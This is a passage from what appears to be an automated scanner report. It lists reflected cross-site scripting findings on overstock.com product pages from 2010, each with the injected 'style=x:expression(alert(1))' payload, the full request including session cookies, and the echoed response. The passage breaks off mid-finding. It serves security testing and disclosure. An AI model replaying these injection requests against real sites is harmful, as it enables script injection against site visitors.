Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404896720:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=39
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107091

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ke
...[SNIP]...
<input type="hidden" name="42221"style="x:expression(alert(1))"04a83355377" value="1"/>
...[SNIP]...

2.47. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-New-York-Mens-Wool-Blend-Herringbone-Overcoat/4852362/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Wool-Blend-Herringbone-Overcoat/4852362/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 152b5"style%3d"x%3aexpression(alert(1))"c6b4c300c57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 152b5"style="x:expression(alert(1))"c6b4c300c57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Wool-Blend-Herringbone-Overcoat/4852362/product.html?152b5"style%3d"x%3aexpression(alert(1))"c6b4c300c57=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:58:59 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:58:59 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4852362|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:58:59 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404739243:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:58:59 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ke
...[SNIP]...
<input type="hidden" name="152b5"style="x:expression(alert(1))"c6b4c300c57" value="1"/>
...[SNIP]...

2.48. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-Unlisted-Street-Smart-Large-Hobo-Bag/5144756/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Kenneth-Cole-Unlisted-Street-Smart-Large-Hobo-Bag/5144756/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3508"style%3d"x%3aexpression(alert(1))"82e2010aa3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3508"style="x:expression(alert(1))"82e2010aa3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Kenneth-Cole-Unlisted-Street-Smart-Large-Hobo-Bag/5144756/product.html?d3508"style%3d"x%3aexpression(alert(1))"82e2010aa3f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:34 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:34 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408194814:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:34 GMT; Path=/
Set-Cookie: mxcproclicks=5144756|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:34 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=66
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112970

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ke
...[SNIP]...
<input type="hidden" name="d3508"style="x:expression(alert(1))"82e2010aa3f" value="1"/>
...[SNIP]...

2.49. http://www.overstock.com/Clothing-Shoes/Liliana-by-Adi-Womens-Faux-Suede-High-heel-Boots/3699769/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Liliana-by-Adi-Womens-Faux-Suede-High-heel-Boots/3699769/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5ae3"style%3d"x%3aexpression(alert(1))"4290b54e8c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5ae3"style="x:expression(alert(1))"4290b54e8c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Liliana-by-Adi-Womens-Faux-Suede-High-heel-Boots/3699769/product.html?e5ae3"style%3d"x%3aexpression(alert(1))"4290b54e8c5=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:53:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:53:39 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289404419643:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:53:39 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3699769|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:53:39 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 121105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Li
...[SNIP]...
<input type="hidden" name="e5ae3"style="x:expression(alert(1))"4290b54e8c5" value="1"/>
...[SNIP]...

2.50. http://www.overstock.com/Clothing-Shoes/London-Times-Womens-Cap-Sleeve-Seamed-Dress/5067276/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/London-Times-Womens-Cap-Sleeve-Seamed-Dress/5067276/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eb6e"style%3d"x%3aexpression(alert(1))"cfe589e8801 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2eb6e"style="x:expression(alert(1))"cfe589e8801 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/London-Times-Womens-Cap-Sleeve-Seamed-Dress/5067276/product.html?2eb6e"style%3d"x%3aexpression(alert(1))"cfe589e8801=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:08 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:08 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=5067276|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:08 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408108547:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:08 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115504

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Lo
...[SNIP]...
<input type="hidden" name="2eb6e"style="x:expression(alert(1))"cfe589e8801" value="1"/>
...[SNIP]...

2.51. http://www.overstock.com/Clothing-Shoes/MG-Black-Mens-Zip-Front-Jacket/5126198/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MG-Black-Mens-Zip-Front-Jacket/5126198/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e395"style%3d"x%3aexpression(alert(1))"96e916c06e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e395"style="x:expression(alert(1))"96e916c06e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MG-Black-Mens-Zip-Front-Jacket/5126198/product.html?2e395"style%3d"x%3aexpression(alert(1))"96e916c06e9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:06 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:06 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5126198|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:06 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404746370:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:06 GMT; Path=/
Keep-Alive: timeout=5, max=27
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104054

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>MG
...[SNIP]...
<input type="hidden" name="2e395"style="x:expression(alert(1))"96e916c06e9" value="1"/>
...[SNIP]...

2.52. http://www.overstock.com/Clothing-Shoes/MIA-Womens-Gelato-Wedge-Boots/3095577/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MIA-Womens-Gelato-Wedge-Boots/3095577/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 352bf"style%3d"x%3aexpression(alert(1))"4de5b594fe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 352bf"style="x:expression(alert(1))"4de5b594fe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MIA-Womens-Gelato-Wedge-Boots/3095577/product.html?352bf"style%3d"x%3aexpression(alert(1))"4de5b594fe9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:52:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:52:41 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404361238:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3095577|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:52:41 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:52:41 GMT; Path=/
Keep-Alive: timeout=5, max=40
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113847

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="352bf"style="x:expression(alert(1))"4de5b594fe9" value="1"/>
...[SNIP]...

2.53. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-M6700-Charm-Womens-Sunglasses/5066840/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-M6700-Charm-Womens-Sunglasses/5066840/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5d3"style%3d"x%3aexpression(alert(1))"3cb36e7068e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c5d3"style="x:expression(alert(1))"3cb36e7068e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/MICHAEL-Michael-Kors-M6700-Charm-Womens-Sunglasses/5066840/product.html?3c5d3"style%3d"x%3aexpression(alert(1))"3cb36e7068e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:51 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:51 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5066840|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:51 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408211822:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109345

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="3c5d3"style="x:expression(alert(1))"3cb36e7068e" value="1"/>
...[SNIP]...

2.54. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Double-Breasted-Wool-Blend-Peacoat-with-Scarf/5109988/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Double-Breasted-Wool-Blend-Peacoat-with-Scarf/5109988/product.html

Issue detail

